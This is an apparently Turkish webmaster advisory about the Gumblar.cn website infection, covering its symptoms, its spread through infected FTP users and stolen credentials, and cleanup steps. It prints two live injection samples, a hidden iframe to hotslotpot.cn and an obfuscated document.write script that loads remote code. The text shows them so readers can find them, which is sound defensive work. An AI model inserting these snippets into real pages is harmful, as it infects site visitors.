Merhaba,

Son günlerde, web sitenizin adresini girdiğinizde, web siteniz yerine aşağıdaki gibi hata mesajları alıyorsanız,

Parse error: syntax error, unexpected ‘<', expecting T_VARIABLE or '$' in /home/sitem/public_html/components/com_content/views/article/tmpl/default.php on line 145

ya da web sitenize baÄŸlanmaya çalıştığınızda, browser’ınızın en altında bulunan durum çubuÄŸunda da baÅŸka bir IP görünüyorsa

94.247.2.195

ya da sitenize girmek istediğinizde bilgisayarınızdaki antivirüs yazılımı tarafından şüpheli site uyarısı geliyorsa siz de gumblar.cn virüsünün kurbanısınız demektir.

Bu virüs web hosting alanınızda bulaştıktan sonra sitenizde, tüm index.php dosyalarına aşağıdaki şekilde eklemeler yapar.

• <iframe src="http://hotslotpot.cn/in.cgi?income67" width=1
  height=1 style="visibility: hidden"></iframe>

•  
  document.write(unescape('%3CRhSsc5uriptUd%20sPQrC
  Rc%3D5u%2F5u%2F9CR4sW%2E5u24R6M7GS%2EPQ2PQ
  %2E1Ud95%2FsWj5uqusWeUdrsWy%2EGSjs3E%3CCR
  %2FsRhScR6Mript%3E').replace(/R6M|RhS|GS|5u|Ud
  |PQ|CR|sW/g,""));    

Gumblar.cn virüsü siteme nasıl bulaştı

Öncelikle, gumblar.cn virüsü çok fazla sayıda web sayfasına bulaşmış durumda. Genelde, bu virüsün sizin web sayfanıza bulaşması için sitenize, ftp ile ulaşabilecek kişilerin bilgisayarına bulaşmış olması gerekiyor. Size bulaştıktan sonra siz web sitenize ftp ile bir dosya yüklüyorsunuz. Virüs böylece sitenize bulaşıyor, ve FTP ayarlarınız da ele geçirilmiş oluyor.

yani sitenizde, bu virüs varsa muhtemelen bilgisayarınızda da bu virüs ya da trojan bulaşmış olabilir.

İlk yapmanızı önereceğimiz şey, bilgisayarınızda yoksa bir antivirüs + anti malware + firewall kurmanız. ve bu virüsü bilgisayarınızdan silmenizdir.

Bilgisayarınızı temizledikten sonra, tek tek her dosyada eklenmiş olan yukarıdaki gibi satırları silmeniz gerekiyor. Bu virüs içerisinde index.html ya da index.php olmayan dizinlerde de bu dosyaları kendisi eklemektedir. Bu dosyalardan bu kodları silmek, varsa temiz bir yedeğinizden sitenizi yeniden yaratmalısınız.

Yeniden yaratma sırasında, imajlar, css dosyaları gibi yine sitenize yukleyeceğiniz dosyalar varsa, bu dosyaları da yine bir antivirüs programı ile, ve göz gezdirerek temizlemelisiniz.

Internet Explorer bazı resimleri html olarak çalıştırmaya çalışır, bu nedenle resimlerinizi de belki uzantılarını html yaparak, içerisinde yukarıdakine benzer function ya da script gibi kelimeler geçiyor mu diye kontrol edebilirsiniz.

Bu virüs sizin ftp şifrelerinizi ele geçirmiştir. Yalnız bu virüs sitenizde arka kapılar ( backdoors ) yarattığı için ftp şifrenizi değiştirmek bir çözüm olmayacaktır. .htdocs gibi dosyaları da yine incelemeniz gerekiyor.

Bu arada aÅŸağıdaki yazı’da ilginizi çekebilir.